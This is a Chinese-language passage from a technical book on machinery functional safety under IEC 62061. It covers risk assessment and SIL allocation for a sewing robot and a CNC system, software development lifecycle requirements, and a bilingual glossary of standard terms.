下面仍然以缝纫机器人为例介绍上述风险分析过程。缝纫机器人的操作员在换缝纫针(线)的过程中,若其他人员误操作开启机器人,则可能使操作员遭受肢体残疾等永久性伤害。根据表8-22中的伤害严重程度等级,取Se=4。 操作员更换缝纫针的频率为每2周1次,更换缝纫线的频率为每3小时1次,这里频率取最大值即每3小时1次;同时操作员在机器人运动区域内的停留时间大约为5分钟。根据暴露的频率,可知Fr=5,但因为持续时间小于10分钟,因此Fr应该降一级,即Fr=4。 由于因误操作发生事故的概率极低,仅为可能发生,因此根据表8-24中的危险事件发生概率等级,Pr取3。 操作员在给机器人更换缝纫针或缝纫线的过程中,若发生误启动等误操作,则操作员几乎无法避免伤害,根据表8-25中的避免或限制伤害发生的概率等级,可将该情形下的Av取5,即不可能避免或限制伤害发生。 与该危险对应的相关参数如表8-27所示。 表8-27 危险相关参数 根据表8-26,可以知道该危险的SIL值为3,对应的SRCF的安全需求如表8-28所示。 表8-28 SRCF的安全需求 3. 软件开发活动完整性验证 为确保上述安全相关控制功能的需求得到正确设计、实现和确认,应保证软件开发活动的完整性。下面分别从人员分工与职责划分、软件生命周期和文档的完整性、软件开发过程及阶段成果等方面介绍如何符合标准要求。 (1)人员分工与职责划分。 人员分工与职责划分主要应考虑软件开发过程中的组织架构、职责划分、人员培训、经验和资格等方面,具体如表8-29所示。 表8-29 人员分工与职责划分 (2)软件生命周期和文档的完整性。 软件生命周期和文档的完整性主要应考虑软件生命周期各个阶段的计划、活动、文档的完整性、文档的内容形式及在软件全生命周期内进行的质量保证活动,具体如表8-30所示。 表8-30 软件生命周期和文档的完整性 续表 (3)软件开发过程及阶段成果。 软件开发过程应包括需求阶段,设计与开发阶段,验证、测试与确认阶段,配置管理阶段,维护阶段等,各个阶段应形成对应的阶段成果。例如,在需求阶段应形成、功能安全计划、软件开发需求;在设计与开发阶段应形成设计说明、源代码;在验证、测试与确认阶段应形成验证计划、测试报告;在配置管理阶段应具有配置管理体系、配置管理文档及相应的配置管理技术和措施;在维护阶段应具有相关的维护记录、修改记录及相应的技术和措施等。下面以软件的需求阶段为例,介绍应用案例与标准的符合情况,如表8-31所示。 表8-31 软件需求阶段成果 本节结合实际应用案例,从复杂机器人控制软件系统的失效模式分析、风险评估、软件开发活动完整性等方面入手,介绍了如何验证安全相关机械/工业机器人控制系统软件的功能安全是否符合标准要求。 8.3 具有安全功能的数控系统应用示范 8.3.1 概述 数控系统的安全功能能够确保系统在出现故障时进入安全状态,避免对人员、设备、环境造成危害,或者通过分析、诊断等手段,实现故障消除,保证实时控制过程的继续。数控系统的安全功能依靠安全相关控制系统功能的正确执行,主要包括风险分析、安全完整性分析及决策等几个步骤,最终通过安全状态切换或故障消除满足安全控制要求。 8.3.2 验证实践 1. 数控系统安全相关控制功能(SRCF)规范要求 数控系统安全相关控制功能和安全完整性等级主要由两个方面决定:一是机器风险评估结果,包括针对各种特定危险的风险降低过程所需的安全功能;二是机器操作特性(操作模式、循环时间、响应时间、性能、环境条件、人机交互)。所有和安全相关控制功能有关的信息,都可能影响数控系统安全相关控制功能的设计,包括:安全相关控制功能预期实现或防止的机器行为的描述、安全相关控制功能之间及其与任何其他功能(无论机器内外)之间的所有界面、安全相关控制功能要求的故障响应等。 数控系统SRCF规范应描述各个需要执行的SRCF细节,包括: ·SRCF应激活或禁用的机器条件,如操作模式; ·可能同时激活,但会造成冲突动作的那些功能之间的优先权; ·各SRCF的工作频率; ·各SRCF要求的响应时间; ·SRCF同其他机器功能之间的接口; ·要求的响应时间,如输入、输出装置的响应时间; ·对各SRCF的描述; ·故障响应功能及操作的各种限制描述(机器重新启动或继续运转等),以防止初始故障就导致机器停止运行; ·工作环境描述,如温度、湿度、灰尘、化学物质、机械振动和冲击; ·试验及各种相关设施,如试验设备、试验接入端口; ·预期用于SRCF机电装置的操作循环周期、工作循环周期和/或使用类别。 数控系统中,每个SRCF的安全完整性要求应来自风险评估,以确保达到必要的风险降低,安全完整性要求表示为SRCF每小时危险失效概率的目标失效值(见表8-32)。 表8-32 SRCF每小时危险失效概率的目标失效值 2. 数控系统中安全相关电气控制系统的设计与整合 数控系统中SRECS的选择或设计(包括总体硬件、软件体系结构、传感器、执行元件、可编程电子器件、嵌入式软件、应用软件等)应符合下列要求。 (1)硬件安全完整性要求,包括硬件安全完整性体系结构限制要求、危险随机硬件失效概率要求。 (2)系统安全完整性要求,包括失效避免要求、系统故障控制要求。 (3)故障检测SRECS行为要求。 (4)安全相关软件设计和开发要求。 SRECS在进行设计和集成时,应考虑可维护性和可测试性,以便执行SRECS中的相关功能。SRECS设计,包括诊断和故障响应功能,应形成文件。文件应精确、完整、简明,符合预期目的,可存取、可维护,版本可以控制。在SRECS设计、开发和执行期间,执行的结果应在适当阶段验证。 在系统性故障的控制要求方面,应采取下列措施。 (1)掉电保持:SRECS应具有相应功能,以使其在失去供电时,可以达到或保持机器的安全状态。 (2)控制临时子系统失效影响:SRECS应按下列方式设计,包括单独子系统或子系统的一部分的电压变化(中断、电压降低等)不会导致危险(电压中断将影响电机电路,不应在电源恢复时造成意外启动);过电压或欠电压应尽早查明,这样就可以通过掉电程序或切换到第二个动力单元使所有输出转换到安全状态;必要时,过电压或欠电压应尽早查明,内部状态可以保存在非易失性存储器中,这样就可以通过掉电程序将所有输出设置为安全状态,或者通过掉电程序切换到第二个动力单元使所有输出转换为安全状态。 (3)控制来自任何数据通信过程(包括传输差错、重复、删除、插入、重新排序、程序或数据残缺、延迟和假消息)的错误影响和其他影响。 (4)当危险故障在某个界面出现时,在危险可能发生前,应执行故障响应功能。 3. 数控系统安全完整性等级(SIL)分配及评估示范 对于每一个特定危险,安全完整性要求由SRECS执行的安全相关控制功能分别确定得出。图8-5给出了数控系统安全完整性等级(SIL)分配的基本流程。 如图8-5所示,风险评估是一个迭代过程,这表明该过程可能不止执行一次。 通过确定风险参数对每个危险进行风险评估。如图8-6所示,数控系统的风险评估参数如下。 (1)伤害严重程度,Se; 图8-5 数控系统SIL分配的基本流程 (2)数控系统中,伤害发生的概率是下列因素的函数; ——操作员暴露在危险中的频率和持续时间,Fr; ——危险事件发生概率,Pr; ——避免或限制伤害发生的概率,Av。 安全完整性等级评估通常以对SRCF最坏情况的考虑为基础。在数控系统中,虽然不可挽回的伤害可能发生,但是比可挽回伤害发生的概率要低很多,因此应考虑每一个严重程度等级,可能每个严重程度等级都对应一个SRCF。如果执行同一个SRCF,那么应使用最高SIL等级。 图8-6 数控系统中用于风险评估的参数 在数控系统中,伤害严重程度能够通过可挽回的伤害、不可挽回的伤害和死亡来进行评估。根据伤害的后果从表8-33中选择严重程度的适当值。其中,4代表致命或严重的伤害,伤者在康复后难以从事相同的工作(即使有从事相同工作的也极少);3代表严重的伤害,伤者在康复后存在可以继续从事相同工作的可能性,如断肢;2代表需要专业医疗护理的伤害,包括严重的破口、刺伤及严重的撞伤;1代表需要急救护理的较小伤害,包括擦伤和较轻的撞伤。 表8-33 数控系统中伤害的严重程度 伤害发生概率的3个参数(Fr、Pr和Av)应互相独立地进行评估。每个参数需要从最坏情况考虑,从而确保数控系统的SRCF没有被错误指定为比规定等级低的SIL。通常情况下,基于任务进行分析,以确保伤害发生概率评估被给予恰当的考虑。在数控系统操作员暴露在危险中的频率和持续时间方面,确定等级时应考虑如下内容(见表8-34)。 (1)在所有使用数控系统的方式的基础上进入危险区,如正常运行、维护; (2)进入的性质,如手工送料、设置。 当持续时间小于10分钟时,Fr可能会降到下一个等级。这并不适用于暴露频率大于或等于1次/时的情况。当暴露频率大于或等于1次/时时,Fr不会降低。 表8-34 数控系统操作员在危险中暴露的频率和持续时间(Fr)等级 使用参数评估数控系统风险时应考虑下述因素。 (1)在不同的使用方式(正常操作、维护、故障发现等)下,与危险有关的机器零部件行为的可预见性。有必要仔细考虑控制系统,特别是与意外启动风险相关的控制系统,但是不要考虑任何SRECS的保护效应。如果SRECS失效,则评估暴露风险量是必要的。概括来说,必须考虑机器或进行加工的材料是否有以意外方式运作的倾向。机器的行为将变化,从完全可以预见到无法预见,但是对意外事件的考虑不能打折扣。 (2)规定或可预见的与危险机器零部件间交互作用有关的人类行为特性,以下列因素为特征: ·工作压力,如由于时间限制,在完成工作任务过程中可感觉的不良状态; ·缺乏危险相关认识。这会受一些因素的影响,如技能、培训、经验、机器/加工的复杂性。 这些因素通常并不直接受SRECS设计者的影响,但是任务分析将暴露那些不能完全预见的所有可能方面(包括不可预见的结果)的活动。危险事件的发生概率“非常高”应选择反映正常生产限制和最坏情况的考虑。对于使用任何较低值,正确的原因(如良好定义的应用和用户高水平的知识能力)是必要的。 数控系统中危险事件发生概率(Pr)等级如表8-35所示。 表8-35 数控系统中危险事件发生概率(Pr)等级 避免或限制伤害发生的概率参数确定,可通过考虑机器设计和其预期应用来评估:预期应用有助于避免或限制来自危险的伤害。这些方面包括: ·危险事件的发生是突发的、快速的,或者是缓慢的。 ·撤离危险空间的可能性。 ·元件或系统的性质。例如,刀通常是锋利的;日常环境里的管道通常是热的;电虽然看不见,但其性质通常是危险的。 ·识别危险的可能性。例如,电气危险,铜棒不因其是否带电压而改变它的外观;人们需要用仪器来确定电气设备是否通电;环境条件,高噪声级可能妨碍人们听到机器的启动。 数控系统中避免或限制伤害发生的概率(Av)等级如表8-36所示。 表8-36 数控系统中避免或限制伤害发生的概率(Av)等级 对于每一种危险,如果适用,则对应每一个伤害严重程度等级,叠加在Fr、Pr、Av列的分数,然后在表的Cl列中输入计算后的值。数控系统中用于决定伤害概率级别(Cl)的参数如表8-37所示。 表8-37 数控系统中用于决定伤害概率级别(Cl)的参数 安全完整性等级(SIL)计算,需要查看SIL分配矩阵(见表8-38),其中表示伤害严重程度(Se)的行与有关的列(Cl)相交,交叉点即表示是否需要采取措施。黑色区域表示被指定为SRCF目标的SIL,浅阴影区域表示应使用其他措施。 例如:如果一个特定的危险的Se为3,Fr为4,Pr为5,Av为5,则Cl=Fr+Pr+Av=4+5+5=14。 表8-38 SIL分配矩阵 4. 数控系统中安全相关控制功能安全完整性等级分配及评估示范 嵌入式软件失效和嵌入式软件的其他意外行为会导致系统产生危险故障。为避免或限制数控系统中危险故障的产生,应考虑下列几点。 (1)SRECS软件要素主要特性的描述,应保证质量和具备安全性(软件要素指导)。 (2)对于那些涉及软件的设计,确立所有相关的技术活动与和软件开发有关的规定。在开发此类软件的期间,可用于指导设计者(软件开发过程指导)。 (3)软件评估的参考性框架。让软件设计人员和/或分析人员决定软件要素是否符合SRECS或要被分析的SRECS子系统的安全要求(软件验证指导)。 ① 系统结构界面。 硬件结构对软件施加的限制应定义并形成文件。对于被监控的机器或系统的安全性,任何软件、硬件相互作用的结果应由设计者进行识别和评估,并在软件设计时考虑。 ② 软件规范。 软件规范应考虑下列各项:安全相关控制功能具有对性能准则(精确度、准确度)和瞬时限制(响应时间)的定量描述,可能时,应考虑所有因素的容差或余量;说明系统配置或结构;说明有关硬件的安全完整性(逻辑解算器、传感器等);说明有关软件的完整性;说明有关存储器的容量和系统响应时间的限制;说明操作者和设备界面;说明软件自我监控和由软件执行的硬件监控;当系统运行时允许对所有安全相关控制功能进行验证。 对于各功能模式,应规定其功能要求。一种模式到另一种模式的切换也应规定。功能模式可包括正常模式与一个或多个降级模式。目的是规定所有情况下的行为,以避免在非正常模式下的意外行为。 ③ 预存软件。 预存软件是指还没有被现有系统具体开发并集成到软件其余部分中的源模块,包括先前项目设计人员开发的软件元素或商用软件,如计算、数据排序算法模块。当处理这类软件时,特别是商用软件元素时,设计人员并不总能访问满足预先要求所需的所有要素。对预存软件应采用与软件其他部分同样的验证活动;在可比的执行环境中,预存软件有类似的作用时,应该通过实际经验验证(可能需要评估编译程序更改或不同软件架构格式更改的后果)。 应就预存软件可能导致的任何意外困难与分析人员尽早进行协商。如果预存源模块的开发不如软件其余部分严格,那么其集成可能会导致某些异常或不安全行为。预存软件应采用与其他软件部分相同的配置管理和版本控制原则进行识别。 ④ 软件设计。 软件设计应包括下列内容:符合规范要求的软件架构定义;所有构成软件架构的模块的输入和输出(如以内部和外部数据字典的形式)中断;全局数据;各软件模块(输入/输出、算法、设计特性等);使用的模块或数据文件库;使用的预存软件。 软件应以逻辑方式划分模块并编写,以便验证或维护:若可能,则每个模块或模块组应对应规范中的某项功能;模块间的接口应尽量简化。 正确的软件架构的总体特征为模块应具有高水准的功能内聚及与所处环境的简单接口,具体包括:限制使用全局变量的数目或程度;在存储器中,数组的控制分布(避免数组溢出风险)。 ⑤ 编码。 源代码应:可读、可理解和接受测试;满足软件模块的设计规范;遵循编码手册说明。 ⑥ 软件开发生命周期。 软件开发生命周期应当详细规定和文件化,应包括所有技术活动、必要阶段及足够的软件开发。软件开发生命周期各阶段应分成不同的基本任务,包括:输入(文件、标准等),输出(制作的文件、分析性报告等),执行的活动,进行的验证(分析、测试等)。 ⑦ 配置和版本管理。 配置和版本管理是任何开发都不可或缺的部分。两者可能都需要进行批准。事实上,只有当提供的配置能够识别时,该批准才有效。配置和版本管理涉及配置识别活动、修改管理、建立参考点和软件元素归档,包括对相关数据(文件、测试记录等)的配置管理。具体包括:定义的和受控的软件配置,该配置保证物理归档和用于重新生成前后一致的可执行代码(考虑未来软件制作或修改);修改管理的参考基础;控制方法,使任何问题能进行正确分析,经批准的修改能正确执行。 版本管理涉及修改,修改的原因有:功能安全低于规定;系统故障经验;新的或修正的安全法规;对机器或其使用的修改;对总体安全要求的修改;对操作和维护性能的分析中,指示性能低于目标。 ⑧ 配置和归档管理。 应规定配置和归档管理程序和文件,包括由配置管理的各细项,至少包括:软件规范,初步和详细的软件设计,源代码模块,计划,程序和确认测试的结果;识别规则(源模块、软件版本等);修改处理记录(要求记录等)。 ⑨ 软件验证和确认。 验证活动的目的是证实来自开发周期特定阶段的软件元素符合先前阶段制定的规范和任何可应用的标准或规则。验证活动也作为检测手段,说明在软件开发过程中可能引入的任何错误。软件验证不是一系列简单的测试,对于相对小型的软件元素,即使测试是主要的,其他活动(如审查和分析)不管是否与这些测试有关,也认为是验证活动。在某些情况,它们可以代替一些测试(如不能进行测试的事件,因为测试可能导致硬件损坏)。在软件开发的不同阶段,分析人员应通过实施审查或专门技能认定来评估软件的一致性。软件生命周期内的所有技术方面需经过分析人员的评估。应允许分析人员查阅所有验证报告(测试、分析等)和在软件开发期间使用的所有技术文件。软件的一致性评估是对具体的、可参考的软件版本进行的。对以前评估过的软件的任何修改,对已得到分析人员最终意见认可的部分应指出,以便进行任何补充的评估活动来更新该意见。 ⑩ 软件测试。 软件测试主要包括功能测试、限制测试、非限制测试、性能测试、负载测试、外部设备失效测试、配置测试,以及由测试覆盖的目标范围(功能模块测试、安全相关控制功能测试、规范中各元素测试等)。新软件版本的测试应包括非回归测试。这些测试的目的是在目标系统环境中检测与软件有关的错误。该类型测试检测到的错误包括:处理中断的各种错误机制,运行时间要求的不够,在瞬变模式(启动、输入流、降级模式中的切换等)中软件操作的错误响应,访问存储器中不同资源或组织问题的矛盾,不能检测故障的集成测试,软件/硬件接口错误和堆栈溢出。确认测试是软件规格验证的主要组成部分,覆盖范围应以可追溯矩阵详述,并且应覆盖规范的各元素,包括安全机制,可验证任何操作模式下的软件实时行为。此外,确认应在代表SRECS或SRECS子系统的操作条件下进行。确认结果应记录在确认报告中,至少包括所确认的软件和系统版本、执行的确认测试的描述(输入、输出、测试程序)、用于确认或评估结果的工具和设备、各确认测试是否成功地显示结果、确认评价,以及识别结果不符合安全要求是否接受确认的决定。确认报告应适用于已交付的软件版本,应与各交付软件元素的最终版本一致。 附录A 术语和定义 A.1 机械 【IEC标准条款】 3.2.1 machinery assembly of linked parts or components,at least one of which moves,with the appropriate machine actuators,control and power circuits,joined together for a specific application,in particular for the processing,treatment,moving or packaging of a material. The terms"machinery"and"machine"also cover an assembly of machines which,in order to achieve the same end,are arranged and controlled so that they function as an integral whole. [ISO12100-1:2003,3.1] 【GB标准条款】 3.2.1 机械 由若干零部件组合而成,其中至少有一个零件是可以运动的,并具有适当的机械操作执行机构、控制和动力电路等。它们的组合具有一定应用目的,如物料的加工、处理、搬运或包装等。“机械”这一术语也包括机器的组合,即将同一应用目的若干台机器安排、控制得如同一台完整机器那样发挥它们的功能。 1. 条款目的与意图 定义术语“机械”。 2. 条款解释与示例 机械machinery(或者机器machine),是指由若干零部件组成,至少有一个部件可活动且配以合适的机械执行器、控制和电路的组合体,具有特定的应用功能,特别用在加工、处理、码垛、搬运、包装等工作中。“machinery”也包括多台机器结合完成同一目标、具备统一的控制手段的组合体。 机械一词,源自希腊语mechine及拉丁文machina,原指“巧妙的设计”,作为一般性的机械概念,可以追溯到古罗马时期,主要用于区别手工工具。现代中文中,“机械”一词为机构(mechanism)和机器(machine)的总称。总体来讲,机械就是能帮人们降低工作难度或省力的工具装置,像筷子、扫帚及镊子一类的物品都可以被称为机械,它们是简单机械。而由两种或两种以上的简单机械构成的工具就是复杂机械,通常把这些比较复杂的机械叫作机器。 广义的机械包括自动化加工设备、机械手(臂)、机器人等。早期机械/工业机器人的主要形态是机械手臂,在工业界被广泛应用,直至现在机械手臂还在机器人领域中占很大比重,其涉及的主要技术是驱动和控制。近几十年来,随着信息化技术的飞速发展,机械/工业机器人在感知、计算能力、规划和控制、人机交互、人工智能等方面有了长足进步。 A.2 机械控制系统和安全相关电气控制系统 【IEC标准条款】 3.2.2 machine control system system which responds to an input from,for example,the process,other machine elements,an operator,external control equipment,and generates an output(s) causing the machine to behave in the intended manner. 3.2.4 Safety-Related Electrical Control System (SRECS) electrical control system of a machine whose failure can result in an immediate increase of the risk(s) NOTE A SRECS includes all parts of an electrical control system whose failure may result in a reduction or loss of functional safety and this can comprise both electrical power circuits and control circuits. 【GB标准条款】 3.2.2 机械控制系统 对来自过程、其他机械元素、操作人员或外部控制设备的输入做出响应,并且生成输出,使机械按照预定方式工作的系统。 3.2.4 安全相关电气控制系统(SRECS) 其失效可能导致风险立即增加的机械电气控制系统。 注:SRECS包括由电源电路和控制电路组成的全部电气控制系统,其失效可能导致功能安全的降低或丧失。 1. 条款目的与意图 定义术语“机械控制系统”和“安全相关电气控制系统”。 2. 条款解释与示例 机械控制系统是指对过程、其他机械元素、操作人员、外部控制设备等的输入产生输出,并使机器按照预先机制工作的系统。 安全相关电气控制系统(SRECS)是指一旦失效就可能会导致设备风险立即增加的机械电气控制系统,包括电源电路、控制电路等全部的电气控制系统。 SRECS包括信息采集感知(传感器及检测装置,如急停按钮、安全门锁、安全光幕、温度/湿度/亮度等传感器)、信息评估(安全继电器、安全PLC、功能安全评估软件等)、动作执行(执行装置,如带有强制断开结构的接触器、强制重启或恢复的软件模块等)等功能。 SRECS与普通的CS(control system)有什么不一样呢? 首先,SRECS是CS在安全性上的升级版,是更高级的CS。采用了普通继电器或可编程逻辑控制器的控制功能主要是根据控制的目的(对物料进行加工、处理、包装、搬运等)设计的,以完成预定动作。在工业现场,机器在工作过程中(执行正常的工序、工艺动作),可能会由于软件、硬件、外部环境等方面的一些意外情况,对人员的健康、设备的运行、所处的工作环境等造成潜在的威胁,导致生命财产的损失。为了能够在故障发生的时候,避免数据丢失、人员伤亡或事故影响的扩大化,需要在需求、设计、实施阶段,根据可能发生的危险做出风险评估,制定安全保障措施,以避免或减少危险事故的发生。因此,根据IEC 62061的规定,安全控制系统分为不同等级,即安全等级较低的控制系统仅能满足控制功能,只有较高等级的控制系统,或者称之为安全控制系统,才可能满足较高的安全技术要求。 其次,SRECS是确保设备在出现故障时仍处于安全状态的系统。安全风险可以来自人的不安全行为、设备的不安全状态、环境的不安全因素。人的不安全行为可以通过加强企业的安全管理制度、培训员工的安全意识等来降低潜在安全风险。环境的不安全因素也可以通过各种手段、措施减少、消除,以保持生产环境的安全性,降低风险。那么又如何避免设备处于不安全状态呢?SRECS就是为避免或降低设备的不安全状态而采取的保障措施。SRECS在启动、停止、出现故障时对机器提供安全保护。就软件而言,其可采取冗余备份、向前向后恢复等手段,在系统出现故障时保护执行状态、运行数据,并避免执行器因非法动作而导致的人身伤害等安全风险。一旦机器出现危险,系统就立即做出反应并输出正确的信号或使机器安全停车,以阻止危险事件的发生或事故的扩散。 最后,SRECS的优先级高于普通CS,也就是说,当出现危险情况时,SRECS在确保不失效的前提下,可靠而安全地切断系统控制回路,对数据进行备份及恢复。 A.3 子系统及其元素 【IEC标准条款】 3.2.5 subsystem entity of the top-level architectural design of the SRECS where a failure of any subsystem will result in a failure of a safety-related control function. (在2012年本标准的修正稿Edition1.1中,where a failure更改为where a dangerous failure;in a failure更改为a dangerous failure。) NOTE1 A complete subsystem can be made up from a number of identifiable and separate subsystem elements,which when put together implement the function blocks allocated to the subsystem. NOTE2 This definition is a limitation of the general definition of IEC 61508-4:`set of elements which interact according to a design,where an element of a system can be another system,called a subsystem,which may include hardware,software and human interaction. (在2012年本标准的修正稿Edition1.1中,此项被删除。) NOTE3 This differs from common language where "subsystem" may mean any sub-divided part of an entity,the term"subsystem"is used in this standard within a strongly defined hierarchy of terminology:"subsystem" is the first level subdivision of a system.The parts resulting from further subdivision of a subsystem are called"subsystem elements". 3.2.6 subsystem element part of a subsystem,comprising a single component or any group of components 62061. 【GB标准条款】 3.2.5 子系统 SRECS高层结构设计的实体,其中任何子系统的失效将导致安全相关控制功能失效。 注1:完整的子系统可能由许多可识别的及单独的子系统单元构成,一起分配到子系统执行功能块的作用。 注2:该定义局限于GB/T20438.4的一般定义:按照设计相互作用的一组元素,可能包括相互作用的硬件、软件和人。系统中的某一元素可以自成另外的系统,成为子系统。 注3:在公开语言中,“子系统”可以指一个实体的任何细节部分。与此不同的是,本标准使用的术语“子系统”是在术语学明确规定的层次范围内使用的:“子系统”是系统的第一级细分。由子系统进一步细分而产生的部分称为“子系统元素”。 3.2.6 子系统元素 子系统的一部分,由单一元件或任何元件组构成。 1. 条款目的与意图 定义术语“子系统”和“子系统元素”。 2. 条款解释与示例 子系统是指SRECS顶层架构设计的实体(组成),任何子系统的失效将导致安全相关控制功能的失效。值得注意的是,在2012年本标准的修正稿Edition1.1中,把失效加了危险一词作为前缀,意味着只产生非安全风险失效的子模块不作为SRECS的子系统,描述更为准确。而子系统元素是子系统的一部分,由单一元件或者多个元件构成。 A.4 危险、危险状况、防护措施和风险 【IEC标准条款】 3.2.10 hazard (from machinery) potential source of physical injury or damage to health. [ISO12100-1:2003,3.6 modified] NOTE The term hazard can be qualified in order to define its origin or the nature of the expected harm (e.g.electric shock hazard,crushing hazard,cutting hazard,toxic hazard,fire hazard). 3.2.11 hazardous situation circumstance in which a person is exposed to a hazard(s). [ISO12100-1:2003,3.9,3.10 modified] 3.2.12 protective measure measure intended to achieve risk reduction. [ISO12100-1:2003,3.18,3.19 modified] 3.2.13 risk combination of the probability of occurrence of harm and the severity of that harm. [ISO12100-1:2003,3.11,3.12] 【GB标准条款】 3.2.10 危险(来自机器的) 潜在的伤害身体或损害健康的来源。 注1:改写GB/T15706.1—2007,定义3.6。 注2:危险这一术语可由其起源或预计伤害的性质(如电击危险、挤压危险、切割危险、中毒危险、火灾危险)进行规定。 3.2.11 危险状况 人员暴露于有危险的环境。 注:改写GB/T 15706.1→2007,定义3.90 3.2.12 防护措施 降低风险的措施。 注:改写GB/T 15706.12007,定义3.180 3.2.13 风险 伤害发生概率和伤害发生严重程度的综合。 [GB/T15706.l二2007,定义3.11] 1. 条款目的与意图 定义术语“危险”“危险状况”“防护措施”“风险”。 2. 条款解释与示例 Hazard(危险)是指潜在的伤害身体或损害健康的来源。如果有人员暴露在危险的环境或者状态中,就是危险状况。Risk(风险)是指危险发生概率或者严重程度的综合评估值,降低风险的措施则是防护措施。 根据IEC 62061,采用以下四种因素对风险进行判定: (1)伤害的严重程度; (2)人员出现(暴露)在危险区域的频繁程度(频率)和持续时间; (3)危险性事件发生的概率; (4)避免或者限制伤害发生的概率。 这些风险因素构成了用于实现安全相关控制功能的输入参数:采用这些输入参数,可以将风险分摊给安全相关控制要求。IEC 62061提供了风险评估的参数,如图A-1所示。 图A-1 风险评估的参数 A.5 安全功能及安全相关控制功能 【IEC标准条款】 3.2.15 safety function function of a machine whose failure can result in an immediate increase of the risk(s). [ISO12100-1:2003,3.28,3.30] NOTE This definition differs from the definitions in IEC 61508-4 and ISO13849-1. 3.2.16 Safety-Related Control Function SRCF control function implemented by a SRECS with a specified integrity level that is intended to maintain the safe condition of the machine or prevent an immediate increase of the risk(s) 【GB标准条款】 3.2.15 安全功能 其失效会立即造成风险增加的机器功能。 [GB/T 15706.12007,定义3.28] 注:该定义不同于GB/T20438.4和GB/T16855.l的定义。 3.2.16 安全相关控制功能 由具有规定的完整性等级的SRECS执行的控制功能,预期用于保持机器的安全状况或防止风险立即增加。 1. 条款目的与意图 定义术语“安全功能”和“安全相关控制功能”。 2. 条款解释与示例 根据标准定义,安全功能是指其失效会立即造成风险增加的系统功能,而SRCF指具备安全完整性等级的SRECS所执行的功能,用于保持机器的安全状态或者防止风险突然增加。 安全功能的执行者包括硬件和软件。硬件安全功能包括简单容错、诊断等,采用安全传感器来实现,包括急停按钮、安全门锁、安全光栅、安全光幕、激光扫描器、拉绳开关、脚踏开关、安全地毯、双手操作控制装置、安全触边等。 软件安全功能在IEC 62061中描述不太清晰,这是由于传统的机械功能安全软件较简单(如PLC梯形逻辑图等)且所占比例很小,因此主要是由硬件保障的。随着近些年来工业化和信息化深度融合,软件占机械/工业机器人核心控制应用的比例越来越高,安全相关系统的安全需求也逐步由执行安全功能的软件来满足。执行安全功能的软件通过故障诊断判别硬件和其他软件的故障,采用类似冗余等技术措施避免或者降低风险。 安全相关软件与硬件不一样,它强调系统失效的概念,与时间无关(即随着时间推移不存在耗损型失效)。安全相关软件的保障是通过全生命周期各个阶段,采取适当的技术和措施来实现的,比如在设计阶段需要进行软件设计验证、在实现阶段需要做遵循安全代码规则及采取冗余容错手段、在测试阶段需达到语句覆盖、在验证阶段需要采取软/硬件在环仿真等。 A.6 安全完整性相关术语 【IEC标准条款】 3.2.19 safety integrity probability of a SRECS or its subsystem satisfactorily performing the required safety-related control functions under all stated conditions. [IEC 61508-4,3.5.23.5.4 modified] NOTE1 The higher the level of safety integrity of the item,the lower the probability that the item will fail to carry out the required safety-related control function. NOTE2 Safety integrity comprises hardware safety integrity (see3.2.20) and systematic safety integrity (see3.2.22). 3.2.20 hardware safety integrity part of the safety integrity of a SRECS or its subsystems comprising requirements for both the probability of dangerous random hardware failures and architectural constraints. [IEC 61508-4,3.5.53.5.7 modified] 3.2.21 software safety integrity part of the systematic safety integrity of a SRECS or its subsystems related to the capability of software in a programmable electronic system performing its safety-related control functions under all stated conditions during a stated period of time. [IEC 61508-4,3.5.33.5.5 modified] NOTE Software safety integrity cannot usually be quantified precisely. 3.2.23 Safety Integrity Level SIL discrete level (one out of a possible three) for specifying the safety integrity requirements of the safety-related control functions to be allocated to the SRECS,where safety integrity level three has the highest level of safety integrity and safety integrity level one has the lowest. [IEC 61508-4,3.5.63.5.8 modified] NOTE SIL4 is not considered in this standard,as it is not relevant to the risk reduction requirements normally associated with machinery.For requirements applicable to SIL4,see IEC 61508-1 and IEC 61508-2. 【GB标准条款】 3.2.19 安全完整性 在所有规定情况下,SRECS或其子系统圆满执行所要求的安全相关控制功能的概率。 注1:改写GB/T20438.4—2006,定义3.5.2。 注2:项目的安全完整性等级越高,其未能执行所要求的安全相关控制功能的概率就越低。 注3:安全完整性由硬件安全完整性(见3.2.20)和系统安全完整性(见3.2.22)组成。 3.2.20 硬件安全完整性 SRECS或其子系统安全完整性的一部分,包含危险的随机硬件失效概率和结构限制两方面的要求。 注:改写GB/T20438.4—2006,定义3.5.5。 3.2.21 软件安全完整性 SRECS或其子系统的系统安全完整性部分,涉及软件在所有规定条件下,规定时间段内,在可编程电子系统中执行其安全相关控制功能的能力。 注1:改写GB/T20438.4—2006,定义3.5.3。 注2:软件安全完整性一般不能精确量化。 3.2.23 安全完整性等级 一种离散的等级(三种可能的等级之一),用于规定分配给SRECS安全相关控制功能的安全完整性要求。在这里,安全完整性等级3是最高的,安全完整性等级l是最低的。 注1:改写GB/T20438.4—2006,定义3.5.6。 注2:本标准不考虑SIL4,通常不适合与机械相关联的风险降低要求。适合SIIA的要求,见GB/T 20438.1和GB/T 20438.2。 1. 条款目的与意图 定义术语“安全完整性”“硬件安全完整性”“软件安全完整性”“安全完整性等级”。 2. 条款解释与示例 安全完整性是指在所有规定情况下,SRECS或其子系统圆满执行所要求的安全相关控制功能的概率。而安全完整性等级则是一种对安全完整性量化的、离散的等级(三种等级之一)。值得关注的是,IEC 61508规定的安全完整性等级为4级,而在本标准中,不考虑SIL4。安全完整性等级中,3级是最高的,1级是最低的。 在实现SRECS时,必须确保系统完全满足根据目标SIL所确定的全部要求。其目的是有效地降低可能危害安全功能并导致其出现系统性故障和随机性故障的概率。 (1)硬件安全完整性,也就是结构约束和硬件的随机失效概率; (2)系统安全完整性,也就是避免缺陷和控制缺陷时必须具备的要求。 IEC 62061标准中,对硬件安全完整性和系统安全完整性要求(标准条款6.4)、评估要求(标准条款6.6.3)做了详细阐述,并没有对软件安全性要求和评估要求的叙述。下面重点解读软件安全完整性,定义是:SRECS或其子系统的系统安全完整性部分,涉及软件在所有规定条件下,规定时间段内,在可编程电子系统中执行其安全相关控制功能的能力。 硬件部分所能达到的SIL是通过元器件失效概率的经验数据,以及元器件之间的关系计算获得的,因此,可以通过选择不同的元器件或者调整元器件之间的作用关系使整个硬件部分达到所需要的SIL。而软件则与硬件完全不同,由于无法估算每个软件函数或者模块的失效概率,只能通过软件研发的全生命周期的过程管理、测试验证等所采取的技术及安全性分析来保证软件达到预期的SIL。根据IEC 81508-3标准,结合本标准SIL级别的划分,软件SIL定义如表A-1所示。 表A-1 软件SIL定义 